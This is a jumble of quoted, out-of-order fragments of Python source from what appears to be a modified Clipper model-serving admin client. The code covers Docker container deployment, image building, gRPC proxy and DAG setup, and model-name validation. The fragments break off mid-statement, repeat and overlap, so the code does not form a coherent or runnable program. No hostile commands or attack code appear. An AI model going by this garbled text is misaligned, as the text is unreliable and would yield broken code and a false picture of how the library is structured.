requests.exceptions import RequestException", "TypeError: df_contents = StringIO( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image,", "model_info: # if m[\"model_name\"] in model_names and not m[\"is_current_version\"]: #", "certainly want to use one of the other stop_* methods.", "build_and_deploy_DAG(self, name, version, dag_description, labels): if not self.connected: raise UnconnectedException()", "the current set of metrics for this instance. On error,", "inspect_instance(self): \"\"\"Fetches performance metrics from the running Clipper cluster. Returns", "import grpc from .rpc import model_pb2_grpc from .rpc import model_pb2", "will leave containers serving version 3 untouched. Parameters ---------- model_names", "``connect`` first. \"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped all Clipper model containers\") def", "docker_client.images.push(repository=image, stream=True): self.logger.debug(line) return image def deploy_model(self, name, version, input_type,", "model containers serving stale versions of the specified models. For", "of each model will be stopped. Note ---- This method", "the instances proxy_ip = self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name, container_id, container_ip])", "= self.get_all_models() dag_description_ = dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None): # dag_description_=self.get_dag_description()", "\"--setproxy %s %s %s %s\"%(container_ip, \"22222\", proxy_name, \"22223\")) # self.logger.info('[DEPLOYMENT]", "------ :py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException` \"\"\" def get_query_addr(self): \"\"\"Get the IP address", "list all versions of a model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters", "False else: from io import BytesIO as StringIO PY3 =", "mgmt_frontend_url = \"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr()) # for name, url in", "# r = requests.get(url, timeout=5) # if r.status_code != requests.codes.ok:", "version 3 is the current version:: clipper_conn.stop_inactive_model_versions([\"music_recommender\"]) will stop any", "%s %s %s\"%('1', name, version, 'old' , self.cm.admin_ip, self.cm.admin_port, expanded_dag))", "self.cm.get_container_ip(\"localhost\", frontend_container_id) frontend_info = [frontend_name, frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT] ################ Started", "tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\") as context_file: # Create build context tarfile", "= False self.cm = container_manager #############TEST################ self.runtime_dag = \"\" self.lock", "container_ip, host) ## get the ip of the instances proxy_ip", "cluster.\"\"\" self.cm.connect() self.connected = True self.logger.info( \"Successfully connected to Clipper", "model_versions_dict): \"\"\"Stops the specified versions of the specified models. Parameters", "%s %s\"%(backup_info[-1][2], \"22222\", backup_info[-1][3], \"22223\")) # self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy", "_validate_versioned_model_name(name, version) run_cmd = '' if pkgs_to_install: run_as_lst = 'RUN", "an error message (not JSON formatted). Raises ------ :py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException`", "# self.logger.info( # \"Stopped all containers for these models and", "stop the currently deployed versions of models if you specify", "characters, '-' or '.', and must start and end with", "Frontend #################\") #expand the dag description with the model/proxy instances", "self.logger.info(\"Stopped all Clipper model containers\") def stop_all(self, graceful=True): \"\"\"Stops all", "str(version) _validate_versioned_model_name(name, version) run_cmd = '' if pkgs_to_install: run_as_lst =", "stop_* methods. Use with caution. \"\"\" # if not self.connected:", "new runtime DAG to admin daemon\\n%s\"%(expanded_dag)) #tells the proxy runtime", "def add_model(self, model_name, model_version, image, input_type=\"string\", output_type=\"string\", stateful=False): modelinfo =", "self.get_all_models() dag_description_ = dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None): # dag_description_=self.get_dag_description() nodes_list", "image = self.build_model(name, version, model_data_path, base_image, container_registry, pkgs_to_install) self.deploy_model(name, version,", "to use one of the other stop_* methods. Use with", "an IP address or hostname. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All", "+= 1 # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(container_ip, \"22222\",", "raise RequestException( # \"{name} end point {url} health check failed\".format(name=name,", "caution. \"\"\" # if not self.connected: # raise UnconnectedException() #", "image=image, # labels=labels, # batch_size=batch_size) self.logger.info(\"Done deploying model {name}:{version}.\".format( name=name,", "self.cm.get_query_addr() def stop_models(self, model_names): \"\"\"Stops all versions of the specified", "Redis independently, this will not affect Redis. It can also", "without calling ``connect`` first. If graceful=False, Clipper will issue Docker", "from cloudpickle import CloudPickler import pickle import numpy as np", "if deployment_regex.match(version) is None: raise ClipperException( \"Invalid value: {version}: a", "# model_info = self.get_all_models(verbose=True) # model_dict = {} # for", "# host=self.cm.get_query_addr()) # mgmt_frontend_url = \"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr()) # for", "called without calling ``connect`` first. If graceful=False, Clipper will issue", "the running Clipper cluster. Returns ------- str The JSON string", "each model specified in the list will be stopped. Raises", "predictions. Returns ------- str The address as an IP address", "data_path=model_data_path, run_command=run_cmd))) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell()", "backups runtime dag info for tup in backup_info: if tup:", "name, version, dag_description, labels): if not self.connected: raise UnconnectedException() def", "self.cm.get_container_ip(backup_host, backup_proxy_id) backup_info.append([backup_name, backup_id, backup_ip, backup_proxy_name, backup_proxy_id, backup_proxy_ip]) else: backup_info.append([])", "frontend or Redis has crashed. It can also be called", "'.format(proxy_name=proxy_name)) #tells the backups runtime dag info for tup in", "or '.', and must start and end with \" \"an", "raise UnconnectedException() def build_and_deploy_model(self, name, version, input_type, model_data_path, base_image, labels=None,", "{}\".format( model_data_path)) image_result, build_logs = docker_client.images.build( fileobj=context_file, custom_context=True, tag=image) for", "{data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd))) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0,", "__version__), cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try: self.cm.start_clipper(mgmt_frontend_image) # while True: # try: #", "\"--setdag %s %s %s\"%(proxy_ip, \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT] Finished setting DAG", "labels=None, container_registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None): if not self.connected: raise UnconnectedException()", "\"--addruntimedag %s %s %s %s %s %s %s\"%('1', name, version,", "name=name, version=version, input_type=input_type, image=image, num_replicas=num_replicas) # self.register_model( # name, #", "2 but will leave containers serving version 3 untouched. Parameters", "\"{reg}/{image}\".format( reg=container_registry, image=image) docker_client = docker.from_env() self.logger.info( \"Building model Docker", "\"Stopped all containers for these models and versions:\\n{}\".format( # pp.pformat(model_dict)))", "stopped. \"\"\" # if not self.connected: # raise UnconnectedException() #", "\"/tmp/clipper\" # Used Internally for Test; Not Windows Compatible logging.basicConfig(", "not self.connected: raise UnconnectedException() def build_and_deploy_model(self, name, version, input_type, model_data_path,", "of the models whose old containers you want to stop.", "DAG to admin daemon\\n%s\"%(expanded_dag)) #tells the proxy runtime dag info", "df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except TypeError:", "Compatible logging.basicConfig( format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO) # logging.basicConfig( #", "be a valid DNS-1123 \" \" subdomain. It must consist", "of model Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each", "0): try: from cStringIO import StringIO except ImportError: from StringIO", "proxy') count += 1 # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s", "%s %s %s %s %s %s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0], count, backup_info[-1][2],", "'.join(run_as_lst + pkgs_to_install) with tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\") as context_file: #", "On error, the string will be an error message (not", "versions of the specified models. Parameters ---------- model_versions_dict : dict(str,", "the ip of the instances proxy_ip = self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip])", "deployment_regex.match(version) is None: raise ClipperException( \"Invalid value: {version}: a model", "= [frontend_name, frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT] ################ Started Frontend #################\") #expand", "context_file: # Create build context tarfile with tarfile.TarFile( fileobj=context_file, mode=\"w\")", "backup_info.append([]) #self.cm.check_container_status(host, container_id, 0.3, 20) #self.cm.check_container_status(host, proxy_id, 0.3, 20) #time.sleep(25)", "#if(dag_description==None): # dag_description_=self.get_dag_description() nodes_list = graph_parser.get_all_nodes(dag_description_) container_info = [] proxy_info", "all model containers serving stale versions of the specified models.", "\"%(\"localhost\",\"33333\", modelinfo)) return def deploy_DAG(self, name, version, dag_description=None, runtime=\"\"): if", "pkgs_to_install: run_as_lst = 'RUN apt-get -y install build-essential && pip", "version, dag_description=None, runtime=\"\"): if not self.connected: raise UnconnectedException() # model_info", "version 3 untouched. Parameters ---------- model_names : list(str) The names", "# datefmt='%y-%m-%d:%H:%M:%S', # level=logging.INFO) logger = logging.getLogger(__name__) deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\"", "backup_name, backup_id, backup_host = self.cm.add_replica(model_name, model_version, \"22222\", model_image) self.logger.info(\"[Backup] Started", "model info to proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s", "cloudpickle import CloudPickler import pickle import numpy as np from", "{container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd)) df_tarinfo = tarfile.TarInfo('Dockerfile')", "info for tup in proxy_info: proxy_name = tup[0] proxy_id =", "setting proxy info to model') # if(graph_parser.is_stateful(model_info)): # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy", "from requests.exceptions import RequestException import json import pprint import time", "from .rpc import prediction_pb2 from .rpc import management_pb2 from .rpc", "df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) # Exit Tarfile context", "self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy info to model') runtime_dag_id = name+version+str(1)", "file for reading context_file.seek(0) image = \"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name, version=version)", "all versions of the specified models. This is a convenience", "%s with container %s:%s (HOST:%s)\"%(model_name, container_name, container_id, host)) container_ip =", "self.logger.info(\"Clipper is running\") self.connected = True except ClipperException as e:", "from .container_manager import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter from .exceptions import ClipperException, UnconnectedException", "[m[\"model_version\"]] # self.cm.stop_models(model_dict) # pp = pprint.PrettyPrinter(indent=4) # self.logger.info( #", "self.cm.get_container_ip(host, container_id) proxy_name, proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip, host) ##", "runtime_dag_id = name+version+str(1) ## Starting frontend frontend_name, frontend_container_id = self.cm.add_frontend(\"localhost\",", "import prediction_pb2 from .rpc import management_pb2 from .rpc import management_pb2_grpc", "model_names : list(str) A list of model names. All replicas", "os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except TypeError: df_contents", "of lower case \" \"alphanumeric characters, '-' or '.', and", "proxy_id, 0.3, 20) #time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip)) self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s", "requests.exceptions import RequestException import json import pprint import time import", "a model version must be a valid DNS-1123 \" \"", "%s %s %s %s\"%(container_ip, \"22222\", proxy_name, \"22223\")) # self.logger.info('[DEPLOYMENT] Finished", "if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else: # model_dict[m[\"model_name\"]]", "self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG for proxy {proxy_name} '.format(proxy_name=tup[-1])) return def", "model data from {}\".format( model_data_path)) image_result, build_logs = docker_client.images.build( fileobj=context_file,", "image, input_type=\"string\", output_type=\"string\", stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image, inputtype=input_type,", "self.logger.info('[DEPLOYMENT] Finished setting model info to proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel", "can also be called without calling ``connect`` first. \"\"\" self.cm.stop_all_model_containers()", "can also be called without calling ``connect`` first. If graceful=False,", "\" \" subdomain. It must consist of lower case \"", "self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s %s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0],", "m[\"model_name\"] in model_names and not m[\"is_current_version\"]: # if m[\"model_name\"] in", "frontend_container_id = self.cm.add_frontend(\"localhost\", \"mxschen/frontend\",runtime_dag_id, proxy_info[0][2], \"22223\", max_workers=2048) frontend_ip = self.cm.get_container_ip(\"localhost\",", "Docker image to {}\".format(image)) for line in docker_client.images.push(repository=image, stream=True): self.logger.debug(line)", "image with model data from {}\".format( model_data_path)) image_result, build_logs =", "%s:%s (HOST:%s)\"%(model_name, backup_name, backup_id, backup_host)) backup_ip = self.cm.get_container_ip(backup_host, backup_id) backup_proxy_name,", "lower case \" \"alphanumeric characters, '-' or '.', and must", "b in build_logs: if 'stream' in b and b['stream'] !=", "reading context_file.seek(0) image = \"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name, version=version) if container_registry", "= tup[1] proxy_ip = tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(proxy_ip,", "docker_client = docker.from_env() self.logger.info( \"Building model Docker image with model", "info expanded_dag = graph_parser.expand_dag(dag_description_, name, version, container_info, proxy_info, backup_info, frontend_info)", "build_logs = docker_client.images.build( fileobj=context_file, custom_context=True, tag=image) for b in build_logs:", "UnconnectedException from .version import __version__, __registry__ from . import graph_parser", "image = \"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name, version=version) if container_registry is not", "runtime=runtime) self.logger.info(\"Started %s with container %s:%s (HOST:%s)\"%(model_name, container_name, container_id, host))", "= self.cm.add_replica(model_name, model_version, \"22222\", model_image) self.logger.info(\"[Backup] Started %s with container", "# if not self.connected: # raise UnconnectedException() # model_info =", "io import BytesIO as StringIO PY3 = True import grpc", "ip of the instances proxy_ip = self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name,", "(HOST:%s)\"%(model_name, backup_name, backup_id, backup_host)) backup_ip = self.cm.get_container_ip(backup_host, backup_id) backup_proxy_name, backup_proxy_id", "them. You almost certainly want to use one of the", "else: backup_info.append([]) #self.cm.check_container_status(host, container_id, 0.3, 20) #self.cm.check_container_status(host, proxy_id, 0.3, 20)", "data_path=model_data_path, run_command=run_cmd)) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell()", "max_workers=2048) frontend_ip = self.cm.get_container_ip(\"localhost\", frontend_container_id) frontend_info = [frontend_name, frontend_container_id, frontend_ip]", "context_tar.add(model_data_path) # From https://stackoverflow.com/a/740854/814642 try: df_contents = StringIO( str.encode( \"FROM", "Started %s with container %s:%s (HOST:%s)\"%(model_name, backup_name, backup_id, backup_host)) backup_ip", "be reached request predictions. Returns ------- str The address as", "self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addruntimedag %s %s %s %s %s %s %s\"%('1', name,", "still initializing: \\n {}\".format(e)) # time.sleep(1) self.logger.info(\"Clipper is running\") self.connected", "info for tup in backup_info: if tup: self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s", "model_info: # if m[\"model_name\"] in model_names: # if m[\"model_name\"] in", "except ImportError: from StringIO import StringIO PY3 = False else:", "False self.cm = container_manager #############TEST################ self.runtime_dag = \"\" self.lock =", "Kill if it's in the Docker Mode. This parameter will", "is '{reg}'\".format( version=version, reg=deploy_regex_str)) class ClipperConnection(object): def __init__(self, container_manager): self.connected", "calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters ---------- model_names : list(str) A list of", "# TODO: need to modularize self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addruntimedag %s %s %s", "= [] proxy_info = [] backup_info = [] count =", "model_data_path, base_image, labels=None, container_registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None): if not self.connected:", "\"22222\" )) self.logger.info('[DEPLOYMENT] Finished setting model info to proxy') if(graph_parser.is_stateful(model_info)):", "proxy_info, backup_info, frontend_info) self.runtime_dag = expanded_dag # TODO: need to", "JSON string containing the current set of metrics for this", "\"\"\"Stops all processes that were started via Clipper admin commands.", "version, model_data_path, base_image, container_registry=None, pkgs_to_install=None): version = str(version) _validate_versioned_model_name(name, version)", "{proxy_name} '.format(proxy_name=proxy_name)) #tells the backups runtime dag info for tup", "%s\"%(container_ip, \"22222\", proxy_name, \"22223\")) # self.logger.info('[DEPLOYMENT] Finished setting proxy info", "\"\" self.lock = False ################################# self.logger = ClusterAdapter(logger, { 'cluster_name':", "cluster=self.cm.cluster_identifier, name=name, version=version) if container_registry is not None: image =", "From https://stackoverflow.com/a/740854/814642 try: df_contents = StringIO( str.encode( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path}", "model_data_path, base_image, container_registry=None, pkgs_to_install=None): version = str(version) _validate_versioned_model_name(name, version) run_cmd", "\" \"alphanumeric characters, '-' or '.', and must start and", "self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing model Docker image to {}\".format(image)) for line in", "# self.logger.info('[DEPLOYMENT] Finished setting proxy info to model') # if(graph_parser.is_stateful(model_info)):", "\"http://{host}/metrics\".format( # host=self.cm.get_query_addr()) # mgmt_frontend_url = \"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr()) #", "self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(proxy_ip, \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT] Finished setting", "input_type, image, labels=None, num_replicas=1, batch_size=-1): if not self.connected: raise UnconnectedException()", "model Docker image with model data from {}\".format( model_data_path)) image_result,", "def stop_versioned_models(self, model_versions_dict): \"\"\"Stops the specified versions of the specified", "base_image, container_registry=None, pkgs_to_install=None): version = str(version) _validate_versioned_model_name(name, version) run_cmd =", "0.3, 20) #time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip)) self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s", "import logging import docker import tempfile import requests from requests.exceptions", "setting model info to proxy') count += 1 # self.cm.grpc_client(\"zsxhku/grpcclient\",", "google.protobuf.json_format import MessageToDict if sys.version_info < (3, 0): try: from", "self.logger.info('[DEPLOYMENT] Finished setting DAG for proxy {proxy_name} '.format(proxy_name=proxy_name)) #tells the", "# Create build context tarfile with tarfile.TarFile( fileobj=context_file, mode=\"w\") as", "the need to explicitly list all versions of a model", "%s %s %s %s\"%('1', name, version, 'old' , self.cm.admin_ip, self.cm.admin_port,", "time import re import os import tarfile import sys from", "#tells the proxy runtime dag info for tup in proxy_info:", "= df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) # Exit Tarfile context manager", "host=self.cm.get_query_addr()) # mgmt_frontend_url = \"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr()) # for name,", "backup_ip, backup_host) backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id) backup_info.append([backup_name, backup_id, backup_ip, backup_proxy_name, backup_proxy_id,", "instances info expanded_dag = graph_parser.expand_dag(dag_description_, name, version, container_info, proxy_info, backup_info,", "versions of the specified models. For example, if you have", "= requests.get(url, timeout=5) # if r.status_code != requests.codes.ok: # raise", "\"Stopped all containers for these models and versions:\\n{}\".format( # pp.pformat(model_versions_dict)))", "model_dict = {} # for m in model_info: # if", "not self.connected: raise UnconnectedException() # model_info = self.get_all_models() dag_description_ =", "cStringIO import StringIO except ImportError: from StringIO import StringIO PY3", "names of the models whose old containers you want to", "model_names): \"\"\"Stops all model containers serving stale versions of the", "format( container_name=base_image, data_path=model_data_path, run_command=run_cmd))) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size", "graceful=False, Clipper will issue Docker Kill if it's in the", "self.cm.stop_all_model_containers() self.logger.info(\"Stopped all Clipper model containers\") def stop_all(self, graceful=True): \"\"\"Stops", "print_function import logging import docker import tempfile import requests from", "self.connected: # raise UnconnectedException() # model_info = self.get_all_models(verbose=True) # model_dict", "self.cm.admin_port, expanded_dag)) self.logger.info(\"Added new runtime DAG to admin daemon\\n%s\"%(expanded_dag)) #tells", "version of each model will be stopped. \"\"\" if not", "level=logging.INFO) logger = logging.getLogger(__name__) deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex = re.compile(deploy_regex_str)", "you have deployed versions 1, 2, and 3 of model", "self.connected = True self.logger.info( \"Successfully connected to Clipper cluster at", "%(levelname)-8s %(message)s', datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO) # logging.basicConfig( # format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d]", "\"validation is '{reg}'\".format(name=name, reg=deploy_regex_str)) if deployment_regex.match(version) is None: raise ClipperException(", "else: # model_dict[m[\"model_name\"]] = [m[\"model_version\"]] # self.cm.stop_models(model_dict) # pp =", "query frontend can be reached request predictions. Returns ------- str", "\" subdomain. It must consist of lower case \" \"alphanumeric", "= expanded_dag # TODO: need to modularize self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addruntimedag %s", "labels, num_replicas, batch_size) def build_model(self, name, version, model_data_path, base_image, container_registry=None,", "run_cmd = '' if pkgs_to_install: run_as_lst = 'RUN apt-get -y", "stream=True): self.logger.debug(line) return image def deploy_model(self, name, version, input_type, image,", "# self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy info to model') runtime_dag_id =", "for b in build_logs: if 'stream' in b and b['stream']", "leftover Clipper model containers even if the Clipper management frontend", "host_ip, host_port): self.cm.connect_host(host_ip, \"2375\") def add_model(self, model_name, model_version, image, input_type=\"string\",", "# if not self.connected: # raise UnconnectedException() # self.cm.stop_models(model_versions_dict) #", "self.logger.info(\"Started %s with container %s:%s (HOST:%s)\"%(model_name, container_name, container_id, host)) container_ip", "build_model(self, name, version, model_data_path, base_image, container_registry=None, pkgs_to_install=None): version = str(version)", "with container %s:%s (HOST:%s)\"%(model_name, backup_name, backup_id, backup_host)) backup_ip = self.cm.get_container_ip(backup_host,", "IP address or hostname. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas", "\"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd)) df_tarinfo =", "Parameters ---------- model_names : list(str) A list of model names.", "'\\n': #log build steps only self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing model Docker image", "ClipperException( \"Invalid value: {name}: a model name must be a", "proxy_info[0][2], \"22223\", max_workers=2048) frontend_ip = self.cm.get_container_ip(\"localhost\", frontend_container_id) frontend_info = [frontend_name,", "!= '\\n': #log build steps only self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing model Docker", "versions. All replicas for each version of each model will", "backup_info[-1][2], \"22222\" )) self.logger.info('[DEPLOYMENT][Backup] Finished setting model info to proxy')", "in the dict, the key is a model name and", "import model_pb2_grpc from .rpc import model_pb2 from .rpc import prediction_pb2_grpc", "\"\"\" # if not self.connected: # raise UnconnectedException() # model_info", "BytesIO as StringIO PY3 = True import grpc from .rpc", "') run_cmd = ' '.join(run_as_lst + pkgs_to_install) with tempfile.NamedTemporaryFile( mode=\"w+b\",", "\"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd))) df_tarinfo =", "if r.status_code != requests.codes.ok: # raise RequestException( # \"{name} end", "import numpy as np from google.protobuf.json_format import MessageToDict if sys.version_info", "Clipper model containers even if the Clipper management frontend or", "33554432 CLIPPER_TEMP_DIR = \"/tmp/clipper\" # Used Internally for Test; Not", "= StringIO( str.encode( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path,", "in build_logs: if 'stream' in b and b['stream'] != '\\n':", "time.sleep(1) self.logger.info(\"Clipper is running\") self.connected = True except ClipperException as", "in Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped all Clipper cluster and", "the specified models. For example, if you have deployed versions", ".rpc import management_pb2_grpc from .container_manager import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter from .exceptions", "\"an alphanumeric character (e.g. 'example.com', regex used for \" \"validation", "models. Parameters ---------- model_versions_dict : dict(str, list(str)) For each entry", "stale versions of the specified models. For example, if you", "try: from cStringIO import StringIO except ImportError: from StringIO import", "list of model names. All replicas of all versions of", "format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO) # logging.basicConfig( # format='%(asctime)s %(levelname)-8s", "StringIO PY3 = True import grpc from .rpc import model_pb2_grpc", "= \"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name, version=version) if container_registry is not None:", "DAG for proxy {proxy_name} '.format(proxy_name=tup[-1])) return def inspect_instance(self): \"\"\"Fetches performance", "and 2 but will leave containers serving version 3 untouched.", "independently, this will not affect Redis. It can also be", "\"\"\"Stops the specified versions of the specified models. Parameters ----------", "image_result, build_logs = docker_client.images.build( fileobj=context_file, custom_context=True, tag=image) for b in", "explicitly list all versions of a model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`.", "# batch_size=batch_size) self.logger.info(\"Done deploying model {name}:{version}.\".format( name=name, version=version)) def connect_host(self,", "Docker containers and all model containers. If you started Redis", "# logging.basicConfig( # format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s', # datefmt='%y-%m-%d:%H:%M:%S', #", "container_name=base_image, data_path=model_data_path, run_command=run_cmd))) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size =", "version of each model will be stopped. Note ---- This", "expanded_dag # TODO: need to modularize self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addruntimedag %s %s", "the query and management frontend Docker containers and all model", "\"alphanumeric characters, '-' or '.', and must start and end", "up leftover Clipper model containers even if the Clipper management", "self.logger.info(\"Done deploying model {name}:{version}.\".format( name=name, version=version)) def connect_host(self, host_ip, host_port):", "versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_versioned_models(self, model_versions_dict): \"\"\"Stops the specified versions", "self.runtime_dag = expanded_dag # TODO: need to modularize self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addruntimedag", "All replicas for each version of each model will be", "the dag description with the model/proxy instances info expanded_dag =", "graph_parser.get_all_nodes(dag_description_) container_info = [] proxy_info = [] backup_info = []", "the model/proxy instances info expanded_dag = graph_parser.expand_dag(dag_description_, name, version, container_info,", "host_port): self.cm.connect_host(host_ip, \"2375\") def add_model(self, model_name, model_version, image, input_type=\"string\", output_type=\"string\",", "model will be stopped. \"\"\" # if not self.connected: #", "metrics from the running Clipper cluster. Returns ------- str The", "mode=\"w\") as context_tar: context_tar.add(model_data_path) # From https://stackoverflow.com/a/740854/814642 try: df_contents =", "each model will be stopped. \"\"\" if not self.connected: raise", "reg=deploy_regex_str)) if deployment_regex.match(version) is None: raise ClipperException( \"Invalid value: {version}:", "of the specified models. Parameters ---------- model_versions_dict : dict(str, list(str))", "graph_parser DEFAULT_LABEL = [] DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432 CLIPPER_TEMP_DIR = \"/tmp/clipper\"", "'{reg}'\".format(name=name, reg=deploy_regex_str)) if deployment_regex.match(version) is None: raise ClipperException( \"Invalid value:", "run_command=run_cmd)) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0)", "versions of the specified models. This is a convenience method", "e: # self.logger.info(\"Clipper still initializing: \\n {}\".format(e)) # time.sleep(1) self.logger.info(\"Clipper", "model_pb2 from .rpc import prediction_pb2_grpc from .rpc import prediction_pb2 from", "= ClusterAdapter(logger, { 'cluster_name': self.cm.cluster_identifier }) def start_clipper(self, mgmt_frontend_image='{}/management_frontend:{}'.format( __registry__,", "want to stop. Raises ------ :py:exc:`clipper.UnconnectedException` \"\"\" # if not", "Clipper admin commands. This includes the query and management frontend", "= self.cm.get_container_ip(\"localhost\", frontend_container_id) frontend_info = [frontend_name, frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT] ################", "if graph_parser.is_stateful(model_info): backup_name, backup_id, backup_host = self.cm.add_replica(model_name, model_version, \"22222\", model_image)", "to finish the tar file # Seek back to beginning", "from __future__ import absolute_import, division, print_function import logging import docker", "backup_name, backup_id, backup_host)) backup_ip = self.cm.get_container_ip(backup_host, backup_id) backup_proxy_name, backup_proxy_id =", ". import graph_parser DEFAULT_LABEL = [] DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432 CLIPPER_TEMP_DIR", "(e.g. 'example.com', regex used for \" \"validation is '{reg}'\".format( version=version,", "almost certainly want to use one of the other stop_*", "if you have deployed versions 1, 2, and 3 of", "True: # try: # query_frontend_url = \"http://{host}/metrics\".format( # host=self.cm.get_query_addr()) #", "= self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name, container_id, container_ip]) if graph_parser.is_stateful(model_info): backup_name,", "first. If graceful=False, Clipper will issue Docker Kill if it's", "to modularize self.cm.grpc_client(\"zsxhku/grpcclient\", 